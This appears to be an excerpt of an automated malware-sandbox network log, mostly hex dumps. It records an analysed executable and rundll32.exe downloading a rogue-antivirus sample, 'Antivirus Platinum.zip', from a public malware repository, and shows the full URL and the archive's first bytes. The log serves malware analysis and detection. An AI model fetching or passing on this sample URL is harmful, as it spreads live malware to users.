                                                                                                                                                    2022-09-29 12:59:04 UTC9025INData Raw: 17 77 6d 12 6a 0b 69 42 cc d7 d0 3f e8 f1 ff 99 04 ce e7 9a 1c df 50 fb 4e 8f 35 d8 d8 6b 07 ae 29 8f 0a 96 b3 34 47 ae 2d c1 5f 03 2a c9 df d8 1d ee 2e 7b ba 18 88 2b 8f 14 de 24 40 34 bc db 26 98 ba 17 84 53 a2 ac 4b 66 22 a6 4d d9 82 18 b6 e1 91 75 5e c7 09 02 77 57 e9 70 23 36 f5 a4 85 3e dd 61 22 cc f5 b4 e0 6c 07 c7 e5 89 b1 ac b3 f1 f4 65 d2 c6 df 10 76 92 50 d0 5e bc 28 c0 99 ed 9c d6 d3 67 27 26 e2 9d 9a 46 b4 96 1b 93 ce c9 13 af c6 c7 00 f7 da 2b 85 35 b1 70 39 d2 78 83 d1 c1 ca 82 99 3d 45 a9 6b 42 9c 15 e6 86 de 3c 36 96 36 e1 34 fa a5 e2 5c fb 79 69 6e 1c b2 1e 0a 54 77 e7 6c 6a c5 56 d7 8c c1 9b 9e 3f ba aa b7 f0 58 e0 df 9c 6f 4d 19 7c c6 72 8e 25 f4 11 9a fd 71 fb 3d 80 35 26 1c 23 33 04 43 10 f9 64 38 f2 65 e6 ec 79 d3 e4 48 e8 94 7d 00
                                                                                                                                                    Data Ascii: wmjiB?PN5k)4G-_*.{+$@4&SKf"Mu^wWp#6>a"levP^(g'&F+5p9x=EkB<664\yinTwljV?XoM|r%q=5&#3Cd8eyH}
                                                                                                                                                    2022-09-29 12:59:04 UTC9041INData Raw: f6 0a b9 1e eb 5f e8 e1 c4 09 58 f9 09 e8 06 4f ca 1a c4 60 03 ca b5 40 97 03 31 57 1e 4b 40 76 2d 42 54 a0 d7 cd fc 38 1e 4d 74 a3 5a cf 5a 96 92 69 e1 e7 68 60 99 75 1c e6 68 5f b8 c4 3e b8 a6 dc 3b 4d 5b d6 ad f8 2f 62 8d e2 0a 29 f9 40 cb 06 c6 7e 95 fa b9 d2 29 5b d0 f7 75 4a 54 63 d9 ab 7c 4c 9e 35 48 79 83 c9 23 a1 d3 7b 02 fd da a8 06 7a bf 06 4e 9f db 60 bc 57 7d 8f fe 21 6f 25 d7 bd dc 88 bb 2c 1f 39 01 8e 4e 06 c6 e9 5b 5c db aa 66 9a 58 3c 2b d6 45 7a 8b 51 52 18 99 87 c1 af 77 40 61 81 03 8e fb 9a 67 8c a9 c5 aa 5a b7 1f 8a cb 5f ab 75 65 bf 1e ca 4e 8e 61 69 34 cc 26 27 30 b2 1a 28 be d3 1d 78 ea 24 27 57 e3 9d 3f 67 00 a4 ab 9d 59 c8 16 0f 8f 53 b0 45 c8 46 0c ab 85 27 ee c3 18 6f f9 36 0d 26 6a 72 80 29 40 81 84 ba c9 f2 78 f8 45 d1 ab e4
                                                                                                                                                    Data Ascii: _XO`@1WK@v-BT8MtZZih`uh_>;M[/b)@~)[uJTc|L5Hy#{zN`W}!o%,9N[\fX<+EzQRw@agZ_ueNai4&'0(x$'W?gYSEF'o6&jr)@xE
                                                                                                                                                    2022-09-29 12:59:04 UTC9057INData Raw: fd f1 ef dd 9d 1e c2 79 03 bd c9 f2 2f cb 75 52 39 b4 c2 0f 57 1b b8 87 8c 16 b0 00 f1 00 1d 16 f7 ec 0a 49 a0 3d 68 1f 1d bf dc 5f b4 30 16 56 ab 7e 62 cc 5e 55 25 cb 26 9f c1 65 4d 71 11 58 88 88 6f 30 9b c0 64 93 bf 3a 94 4c 48 32 07 39 10 73 88 73 0a 12 9d 62 af 74 6b 74 04 7f 48 16 2b 23 aa 9d 74 45 c9 29 c6 c8 cb 48 be 34 c7 54 3b 09 3a 4d 53 c3 c2 c7 f8 07 2c d2 02 5b c0 e5 36 f5 67 a3 97 6c ea dc d2 47 40 c8 df c9 8e 7c 3b eb a5 c0 1f 46 03 2c 6f ad 9b 98 70 6f a9 91 fa a4 cf 71 d5 1a b0 47 4b f6 90 62 60 d0 af 68 20 87 63 08 7d 56 84 83 b2 e9 81 64 f5 be 77 f8 b8 de 09 1b 58 ea ec 2f 63 01 e9 db ad fc 26 11 c4 54 49 66 60 35 1a 47 c1 63 6d b7 20 17 92 7f 4a b0 66 98 1a e6 87 bf ce 36 ee 9d a4 9b ee 36 7d 83 89 96 83 38 08 0e 7b a9 83 56 05 58 37
                                                                                                                                                    Data Ascii: y/uR9WI=h_0V~b^U%&eMqXo0d:LH29ssbtktH+#tE)H4T;:MS,[6glG@|;F,opoqGKb`h c}VdwX/c&TIf`5Gcm Jf66}8{VX7
                                                                                                                                                    2022-09-29 12:59:04 UTC9073INData Raw: b0 0f 2c b2 24 00 6f 9a e2 7d f3 0b b5 21 d6 0c 5a 47 79 e2 c7 e2 a7 11 69 b5 5f a0 a8 3a e0 f7 50 26 1c ff b2 5c 53 2b f3 35 6a 85 55 89 fe 43 b7 4d 69 04 02 c0 aa fc 6c b0 98 ba 16 4a 2f bd 78 6d fc 48 94 93 19 7f c4 76 d5 c2 0f 3c 4f 57 b7 63 3f d1 d1 17 79 d1 fd 47 2d 0f 83 0c 2f ec 05 96 44 a3 43 47 7d 95 68 1c f8 41 29 7a 44 c0 be 12 4c 32 15 f1 8f 6d d5 00 c2 f4 52 6b 4c 81 e3 d7 8b a6 e2 7f 04 9c e2 69 9a 89 30 48 b7 a4 94 e1 80 a9 fa 77 84 77 bc b4 b9 1e 0e 71 5e 27 a6 1f af 69 15 dd 9e 07 5b d1 67 16 04 f8 35 67 bd 4c 3a de 05 ce c4 b4 b5 c4 f7 5d b5 d4 9f df 13 ec 95 c2 aa ab fd bd c7 8b 49 05 f4 b1 a4 43 89 61 13 9c a4 84 b3 02 56 32 69 02 87 bb 30 fe 70 fa 88 13 11 26 73 84 31 d9 a4 b2 8f 6e 1a fc f2 50 f2 8b 7a 24 00 00 85 37 7e 97 8d 40 30
                                                                                                                                                    Data Ascii: ,$o}!ZGyi_:P&\S+5jUCMilJ/xmHv<OWc?yG-/DCG}hA)zDL2mRkLi0Hwwq^'i[g5gL:]ICaV2i0p&s1nPz$7~@0
                                                                                                                                                    2022-09-29 12:59:04 UTC9089INData Raw: 77 19 cf c7 12 fe e3 67 0d a8 29 f9 eb d8 ea 20 5a f1 ec 58 0e 34 4f 12 57 a8 ae ed c8 2f b9 00 11 1a 78 5d e8 fc d0 b1 76 85 1c fb ae d4 98 8d a0 78 17 c1 e1 05 a2 0b f4 13 9e 84 05 8a db 13 58 f3 19 c2 91 17 13 35 58 af 3a 0d 46 0e c0 3d 97 40 0f fd 2e 60 21 c1 82 2c 24 86 81 fc 64 a8 2c 3a fc fc 52 a9 b6 47 87 35 84 db 5f da ac 21 d6 b3 5a eb 6c df 55 97 0f da 6e 91 9b a7 9e 94 62 d3 ad 9b 8d 04 0a 8b f9 34 e9 b5 b0 9f 71 74 d9 f9 d5 f6 8e f0 7a d4 f7 cd 5e 21 f6 fd ba 7c bd 46 88 79 52 8c 59 15 47 bf b7 42 a8 35 ac ba 0b 0a 9c 87 8b a9 b4 e0 df f6 79 d5 91 90 bb f1 2d ac e9 e6 2a 70 9f 2d 04 a0 b8 60 73 09 d1 88 5c 68 cc 7f ed d2 36 f5 6b 09 bf 3f 0d 4d e4 13 11 82 fe 78 21 2e 0e f4 bd a4 e5 bd ad 45 1d 45 9c a3 74 94 8a 13 e4 49 a7 34 bb 3e 0f 31 d1
                                                                                                                                                    Data Ascii: wg) ZX4OW/x]vxX5X:F=@.`!,$d,:RG5_!ZlUnb4qtz^!|FyRYGB5y-*p-`s\h6k?Mx!.EEtI4>1
                                                                                                                                                    2022-09-29 12:59:04 UTC9105INData Raw: 89 97 89 51 e0 d8 21 60 e8 3d 5d e2 a3 8f 19 e6 1f 7a 98 5b fe 70 75 72 63 44 08 5a 05 1b 1a 99 0a c1 95 eb 60 85 f1 fa 78 e5 ce d4 98 62 16 0b 39 9e cb da a2 e2 f4 f5 97 6e 1f 67 b5 dd 5d f9 c0 02 0b df a8 de 77 fd 6e d5 ae bd 8c ae 6d 24 c2 77 35 af ac 7b f5 d6 02 8b 50 95 00 6d de 35 e8 7e fc df b0 d4 6c 6d 8b d4 a9 8c 0b e7 0b 29 6d 26 4c 28 dd 2f 7a 61 68 6c 36 cb 80 d4 f9 2f 73 94 4a d5 91 31 0d a6 2d af 50 2c 59 19 40 f4 b9 4d 80 94 fc 22 02 22 a2 89 b0 d8 0f 78 01 f6 f3 af b0 ea be 94 48 06 8b 12 a9 0b 78 0b c8 5c 62 c0 5e ee f7 fc 62 a6 52 02 2c 2e c0 00 fe e0 e4 e5 55 43 bc 29 61 8d 95 15 f3 db c1 48 49 ea 37 ed 2a e9 16 ef bc 60 09 f2 48 b0 ec 81 b0 15 dc 64 bd 97 6d 86 e4 1e 08 da 70 32 e2 8a 21 23 df 98 ce d7 1c d1 1e 40 38 3b 97 a5 94 d1 d8
                                                                                                                                                    Data Ascii: Q!`=]z[purcDZ`xb9ng]wnm$w5{Pm5~lm)m&L(/zahl6/sJ1-P,Y@M""xHx\b^bR,.UC)aHI7*`Hdmp2!#@8;
                                                                                                                                                    2022-09-29 12:59:04 UTC9121INData Raw: 95 f3 7e ee 4d 66 e8 7d c4 70 aa 85 36 5b bd 7c e1 22 65 50 d5 05 35 4b 4a 04 01 97 c1 fb 2b dd 94 b7 de 02 30 a8 a1 6d db 73 c2 dc cd dc f2 cf 0e 7d a3 2c 6f 67 35 5f 22 ac fc 68 54 8f 2b f6 3d 06 98 a5 8d 25 13 dd 40 ec c9 ce 6b c3 d1 0b 19 9c 2a 54 48 bb 3f 56 1d 00 3f fb 5c d6 14 e6 07 5f 68 6b cc a5 3e 90 b2 5c 30 a7 4d 03 47 cb cd d0 d9 de e8 0b 1c 2b 1a 1b 19 e1 c2 99 1f 6b 37 2b b9 3c 59 09 4c 35 1d a7 cc 16 4a 0a 75 90 52 5d 6d e9 4b e0 23 a6 5c d8 bf c3 45 86 46 3b 92 af 4a b3 f7 33 e1 d0 59 e4 7f 6a be b7 a8 44 e3 cd 50 93 d6 24 2e f1 69 a5 d6 37 36 00 6b e6 1d 61 96 d9 c4 fd c3 16 60 a7 f0 8c f7 85 d9 9e e6 51 a0 fe a1 0f e6 c2 ca bb 56 c3 50 7b 92 d2 c4 d7 7c 80 17 61 61 d1 24 09 b8 61 91 b9 37 72 9a 5e 4a c7 7c a3 76 81 c7 30 9a b3 5e 6f 52
                                                                                                                                                    Data Ascii: ~Mf}p6[|"eP5KJ+0ms},og5_"hT+=%@k*TH?V?\_hk>\0MG+k7+<YL5JuR]mK#\EF;J3YjDP$.i76ka`QVP{|aa$a7r^J|v0^oR
                                                                                                                                                    2022-09-29 12:59:04 UTC9137INData Raw: 12 db f7 66 45 00 af e1 d3 b8 06 e1 54 66 42 cb a6 28 ef 43 5f ca 13 14 14 93 dc 4b 1f d6 82 80 61 4c 5a d9 cb 38 ed fd 3d c2 47 f1 18 fc df 81 3c de 31 b1 e2 84 e4 f1 04 e1 b9 ad f5 3f 0c b5 06 ef 33 be 5c 97 05 24 9f 39 8f 5e 40 03 45 1d 37 b2 a3 52 84 b2 ac 1b 6f 70 36 84 1a d7 07 ae ae a8 8a f1 5f f5 3c a9 53 6f 76 b9 90 fd 9b 62 d6 0b 55 c0 58 34 0c 98 ed 2e 47 ad 45 34 f2 f1 39 72 51 3f cf ad 23 08 27 f2 a9 a0 66 be 1a 29 87 19 87 34 52 1c 43 bf 72 35 56 97 d9 00 14 45 42 87 f4 45 63 3f bc 56 35 29 72 e8 12 00 46 d2 91 66 23 46 c8 d3 dc 28 93 dc ea 7e ed bb 63 6c 17 85 ae 9b 16 ce c4 51 45 f3 a1 61 90 19 56 57 ee aa 54 44 b6 95 06 f6 3f 7e 50 5c 4b 8f 46 4a 45 d5 f7 df e9 9f eb cd 6f e6 21 a4 9a 47 b9 48 68 69 71 e7 09 10 9b 12 bb c1 4e 52 8c da 07
                                                                                                                                                    Data Ascii: fETfB(C_KaLZ8=G<1?3\$9^@E7Rop6_<SovbUX4.GE49rQ?#'f)4RCr5VEBEc?V5)rFf#F(~clQEaVWTD?~P\KFJEo!GHhiqNR
                                                                                                                                                    2022-09-29 12:59:04 UTC9153INData Raw: 3e 05 1f b9 ca 52 81 24 d0 cb c4 ce 21 2b 31 df 2c 98 01 41 9f fc cd c3 fc b8 e2 c2 8f bf 1a 01 8b 39 ab 86 3c 49 f1 65 70 b5 c9 db fe 0d af 46 11 09 2d 1b 45 03 36 0f 07 98 c7 65 18 17 30 69 6a 0b bf 98 4d a9 68 8c a7 11 e0 5e db 8c 92 fd a6 b8 0f a4 1e d6 25 1a c8 13 3a 94 90 8c e7 84 31 49 12 f0 33 a3 71 b7 17 ae 2c 2e 3b e3 3e 27 ea 54 18 eb 63 3a 53 b1 d5 f0 0c 93 d0 5c fa 5b 86 2f 0c 56 90 3f 8c 4b 0f 55 6d 8f 71 d8 1d 3d f4 26 dd a5 17 ec 57 1c e3 b6 6e 98 86 59 9d f6 36 55 ec 06 d8 ac 73 d2 eb dc 7b 31 af 24 14 16 9d ad 21 f1 86 a2 8a 7c 82 5f 07 d7 16 39 a6 a4 d8 1c 8e 94 63 6c 70 34 e6 8c 89 b3 b0 a8 d6 9e 40 a7 1c a0 42 27 b6 9c 79 3a 01 4c c3 d3 1c c1 03 b4 cf af b5 5c d8 61 35 a0 c9 e4 7b 6f cb 6a 1c bd 48 a7 f9 3c dc 5a 6e 85 0d f0 97 8d b0
                                                                                                                                                    Data Ascii: >R$!+1,A9<IepF-E6e0ijMh^%:1I3q,.;>'Tc:S\[/V?KUmq=&WnY6Us{1$!|_9clp4@B'y:L\a5{ojH<Zn


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    65192.168.2.349740140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:05 UTC9169OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    66140.82.121.3443192.168.2.349740C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:05 UTC9169INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:09 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:05 UTC9169INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    67192.168.2.349741185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:05 UTC9171OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    68185.199.108.133443192.168.2.349741C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:05 UTC9171INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 716432
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "2dd2f92f25598d9ce7015fc31af79216c3c4239d1c9016d16e6d1fa2f0f83264"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 98A4:E4BD:C06779:CC85EC:6335934E
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:05 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6953-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456345.255220,VS0,VE166
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 6d421d309d02bb3feceef23ce2e84412029f92da
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:05 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:05 UTC9172INData Raw: 50 4b 03 04 14 00 01 00 08 00 c3 50 3e 3c b9 dd 88 28 ca ed 0a 00 85 8f 0b 00 20 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 6c 61 74 69 6e 75 6d 2e 65 78 65 23 1e 4a 14 b1 c4 33 c0 bf 0b ce 01 66 9f a5 a5 fa 94 f3 86 ac 9e 88 9a 72 b7 c5 19 87 bb cc 9c ad 47 32 5b 58 17 8d f5 34 86 d9 16 0f 1c 15 31 7c f1 f6 a3 28 84 c7 dc a1 f4 c8 8e 5a 47 34 b7 d2 b8 58 d0 bd f6 1b 49 18 ba 76 bd e0 c6 eb d6 88 07 41 61 a6 35 34 e4 79 45 10 d7 8c b1 11 4d 68 47 d2 c1 27 14 da 92 65 60 d5 ea 14 a7 93 d9 26 ca 0b ef 17 54 58 41 5c c0 93 12 f1 e2 1b c2 d6 22 7b 35 0e 1d 96 da 55 71 44 a7 69 e1 48 a3 86 1e 19 14 ce cb 01 66 c0 fa c6 d4 f4 c3 8a 40 79 22 00 7d 7b 9e fe b1 e5 df 95 75 bf 90 e9 ea 8d 0d 25 96 56 2f 74 1f d9 2b df 87 3d f2 83 9f 41
                                                                                                                                                    Data Ascii: PKP><( Endermanch@AntivirusPlatinum.exe#J3frG2[X41|(ZG4XIvAa54yEMhG'e`&TXA\"{5UqDiHf@y"}{u%V/t+=A
                                                                                                                                                    2022-09-29 12:59:05 UTC9188INData Raw: 9d 17 71 b3 4f 65 76 0d ea b6 ab d4 dd e1 ab 48 68 5f 11 fa 1c 13 ad 60 91 a7 05 ba 9e 5a 13 74 5a 3c b2 b9 71 50 c2 16 7e 29 ab fd be 7c 52 56 ad e6 41 51 02 62 ce 41 40 7b 2f ef 0d 52 34 01 27 d3 6c 9f 27 e9 07 7c 47 fc 43 7f f3 0d b4 60 ae 51 f0 01 88 05 99 6d e7 30 d5 ea 86 03 e2 76 76 72 14 83 92 7c 23 c5 36 d9 5a 4c 2f 02 54 c7 d9 fc 1d e4 b0 1f 9d 6e 76 9d 29 b1 ec 73 f6 6d 90 0a aa b6 b5 09 f5 f8 06 34 91 14 52 87 16 6d e0 86 fb eb 4a d5 df 30 9d 34 e3 c4 03 be ac c8 31 61 88 b5 f2 45 9c 23 c2 63 3d 28 13 2b 88 98 65 fc 66 a7 1f 1e 8c 2b a8 0e 2c 41 d6 62 0a fa f3 6a c7 1c b4 6f b9 8c f0 37 0a 11 f5 c5 2b 0a 61 05 b1 38 9f 15 1e e1 33 f4 6e 53 ea ab 4c ac a5 78 f5 10 d7 76 1e 77 e1 ee 30 7a 8f 40 73 c6 bd 9a 71 75 43 89 30 c1 8e 36 a1 e0 b3 12 b2
                                                                                                                                                    Data Ascii: qOevHh_`ZtZ<qP~)|RVAQbA@{/R4'l'|GC`Qm0vvr|#6ZL/Tnv)sm4RmJ041aE#c=(+ef+,Abjo7+a83nSLxvw0z@squC06
                                                                                                                                                    2022-09-29 12:59:05 UTC9204INData Raw: 85 5c b4 55 0d 8e 3c 15 ab 0b 35 31 a1 b4 02 cf e7 91 25 22 11 61 de 32 b5 d4 e0 7d c2 88 e5 7d 92 b3 d2 d9 c3 b1 00 63 3e 84 f2 94 11 e9 a4 d8 ef 86 97 2c 83 96 ad 05 73 87 50 8b f3 c9 4c 17 3d 6b de 41 e3 de dd 68 32 80 4e c2 46 66 3f 51 6f d3 6d be f4 90 5d 80 13 45 3b 96 c3 5b f1 e2 f5 2d 29 d4 26 a9 e8 d0 50 2a 28 2d 5d 32 83 81 cb 29 c1 3d 8e 21 78 17 36 25 cf cc 9e a3 c6 36 a6 69 df fa b7 e6 c2 06 27 46 c3 2a 30 a5 00 f2 ea fc 45 b6 47 e8 7b 57 4b e3 14 78 f8 c9 25 fe 73 e7 a8 aa 01 9a 6d 28 39 ce f2 6b 4a 99 54 e6 c4 00 df 45 3c cb 5f 9f bf d0 7c 6a 7e 2c 04 53 04 2b 94 a5 4e 11 35 cd a6 0a 29 40 8e 90 42 15 8b 45 31 74 f7 02 19 d6 5d ed 28 3f 34 71 e7 64 00 11 93 0e 26 02 3d 2b 2f f3 7d 56 0b d1 9a 4a 03 1f 09 96 aa ab fa 87 5b 66 63 11 7d 12 17
                                                                                                                                                    Data Ascii: \U<51%"a2}}c>,sPL=kAh2NFf?Qom]E;[-)&P*(-]2)=!x6%6i'F*0EG{WKx%sm(9kJTE<_|j~,S+N5)@BE1t](?4qd&=+/}VJ[fc}
                                                                                                                                                    2022-09-29 12:59:05 UTC9220INData Raw: 4e 0d f5 f9 48 51 64 9c 6a 6d 14 38 63 e7 75 78 06 a8 94 03 51 5f 27 1c 63 81 18 d1 65 b0 24 56 9f 95 bc 7b 20 22 87 73 74 7e 10 9a ca af 13 7a c9 43 07 65 ec 37 d8 b2 10 d5 f6 bc 33 e8 ef ac 0f 3a ec 9b 7a c6 5e 69 7e ae 42 04 66 09 53 72 69 d1 2e 8d 38 a9 88 e8 aa 45 8e e8 d7 00 ba 54 2a ee 5b ab 01 b9 18 54 c5 4c 59 b6 59 70 c9 20 56 02 4f 2b 9d 8c 23 17 e7 93 c6 f1 c4 48 b8 2e 34 90 2c 85 27 09 6e 8e 47 99 f7 31 69 f2 39 f2 a0 35 40 9b b9 6f 12 b1 39 fd d5 ac 20 da 38 7d ca 89 c9 27 a6 b7 88 d4 62 9f 4e 80 f6 78 e8 d6 c5 9d 0e 77 28 23 43 a9 0a d7 15 57 e9 47 84 3f 4a 65 bf 78 b9 48 ee 98 7a 87 95 a7 e2 e5 7d d4 e2 aa 15 b2 ff a6 0e 5b 4a 46 5e fb 19 d9 35 48 1f 8b 2c ea dc 29 2c e3 14 6e 28 5f 44 90 10 32 3d 3f 52 b8 e2 4a e1 27 0b db 24 65 11 e0 e7
                                                                                                                                                    Data Ascii: NHQdjm8cuxQ_'ce$V{ "st~zCe73:z^i~BfSri.8ET*[TLYYp VO+#H.4,'nG1i95@o9 8}'bNxw(#CWG?JexHz}[JF^5H,),n(_D2=?RJ'$e
                                                                                                                                                    2022-09-29 12:59:05 UTC9236INData Raw: d4 5a c6 b8 bb 24 29 8f 2d 0b d1 62 9f a7 2a 18 83 5a ca 78 61 b4 f7 63 b1 c6 e5 8b b7 4e de 8d 77 1b 5f bf a2 14 4f 39 6e 07 36 fd 01 81 73 6d b6 d3 cd 1a 34 3d 09 74 41 77 a2 ac 0d c5 b8 4c a9 18 ab 02 b9 ff 17 fa 01 0f 9d 28 65 9c e1 fb 38 b1 74 90 d9 cb 57 95 4c d6 5f 3e e1 6f 01 f4 3f b2 5a f0 d0 c2 72 2b 74 83 f8 2a 94 17 d9 3a b4 21 45 7a 40 0e 69 38 50 a9 52 a0 fe fd af bb c0 53 12 d1 4a 7a cd 67 76 02 ca db fc 4d 94 33 3a 62 5f ec 17 32 d6 9e 35 93 bb f9 2c c6 0d df e7 80 15 64 45 ec c1 8e 37 c7 12 51 b2 b4 2c 32 47 3a 9b 3c 70 4f 00 ff af 02 dd 09 10 e0 e9 b4 e3 84 2f 8a fc bc 48 90 f0 ff 32 e3 22 c4 2a a6 12 38 55 6b f3 0e a6 75 8a 91 c4 20 7f eb f7 bd 18 8a da 7a 3f 20 b6 88 26 0e 9a d3 0d dd cf 1f f4 86 32 db c5 f9 70 67 7c f5 2c 8e f9 c8 35
                                                                                                                                                    Data Ascii: Z$)-b*ZxacNw_O9n6sm4=tAwL(e8tWL_>o?Zr+t*:!Ez@i8PRSJzgvM3:b_25,dE7Q,2G:<pO/H2"*8Uku z? &2pg|,5
                                                                                                                                                    2022-09-29 12:59:05 UTC9252INData Raw: fe f6 cb fd 23 f7 3d 2b 8b ad 4d 42 1c 90 86 c2 6a d4 c7 9d 6a 51 76 fa c7 d0 04 51 56 96 ef 3b 6a 8d 9a ae 86 58 ea 9e 79 37 19 51 be d5 eb 21 c8 89 58 c7 65 a5 41 de 10 4e d0 d7 0e 84 07 c8 30 7a f7 85 4a 18 ac 78 86 dc e7 12 44 06 4a 14 38 84 7e c9 d2 2f c6 92 8e 7f b5 75 8c b9 d3 16 ed 5a 80 78 56 34 aa 9a 96 79 08 3b ac 63 d1 b4 6d b2 84 40 c4 fc 71 e2 99 61 d9 83 cc fb 21 48 a9 c5 b3 c1 6d 4e 95 7b ac 18 47 71 9a 6c 57 09 0c eb 80 52 19 7e 7b cc 98 a3 ff d0 3a a7 b3 04 f6 31 23 c5 25 32 76 b8 79 68 3a 6b 8c b2 90 fe 4e 11 61 ae 4e 37 59 5c 44 05 1c 0d 76 f7 82 ca 1c a1 e3 71 54 6f 35 40 e1 ad 1e ff 08 01 94 e6 dd e7 8a 7e af 1f 5f 6b 4d e6 d4 aa ae e0 f1 1e d7 bb 9a 4d 13 01 75 52 bc cb 12 0c 53 af 39 07 34 f9 fc 98 d2 aa f4 5d ad cf c5 b6 ce 70 94
                                                                                                                                                    Data Ascii: #=+MBjjQvQV;jXy7Q!XeAN0zJxDJ8~/uZxV4y;cm@qa!HmN{GqlWR~{:1#%2vyh:kNaN7Y\DvqTo5@~_kMMuRS94]p
                                                                                                                                                    2022-09-29 12:59:05 UTC9268INData Raw: d1 80 3f 7a e0 d5 37 e7 c6 92 7a f2 6c 14 d3 7b d8 bf 0e 3a 34 82 a3 bf d1 0d a6 68 48 d4 d0 3b 10 89 ac 05 46 de 29 ba 22 af 31 f6 db 53 79 16 61 4e a2 26 db 93 ef 2c 75 9f 51 36 bd 40 44 5c f5 2e 21 e7 7b 9e 6f ef 8b 04 f4 8c d4 d3 82 82 78 52 97 84 ef b2 9c 5f 0f 94 cd 74 cb 49 56 ed 64 1e 36 6f a4 bb 44 09 31 79 0c a9 82 26 1a c3 6b 41 ac a8 da c0 96 4b dd a6 0c ea 30 c6 39 a9 d3 03 5a d6 ef 5a 50 df 78 c6 d1 0c c5 78 95 48 25 b1 52 44 da 2f d9 27 59 6a 31 9b 8f df e3 06 3a b5 bb 4f c8 eb 5a 4d 49 aa f4 4b 57 3e 65 ad 64 d3 f2 a2 13 34 3d 8c ac a8 a7 09 56 65 fa 8c 47 40 76 ad 00 ea 79 8a 53 5b 71 78 f6 16 86 8e 29 58 35 5a 8c 0c dd 21 0a 49 4e 1a 2f eb ef a5 49 98 8b 55 c7 b6 e4 95 ef 66 fb 8b f4 44 9d 21 82 c9 41 a9 75 63 ce 03 43 47 f0 9b 7f 1f d3
                                                                                                                                                    Data Ascii: ?z7zl{:4hH;F)"1SyaN&,uQ6@D\.!{oxR_tIVd6oD1y&kAK09ZZPxxH%RD/'Yj1:OZMIKW>ed4=VeG@vyS[qx)X5Z!IN/IUfD!AucCG
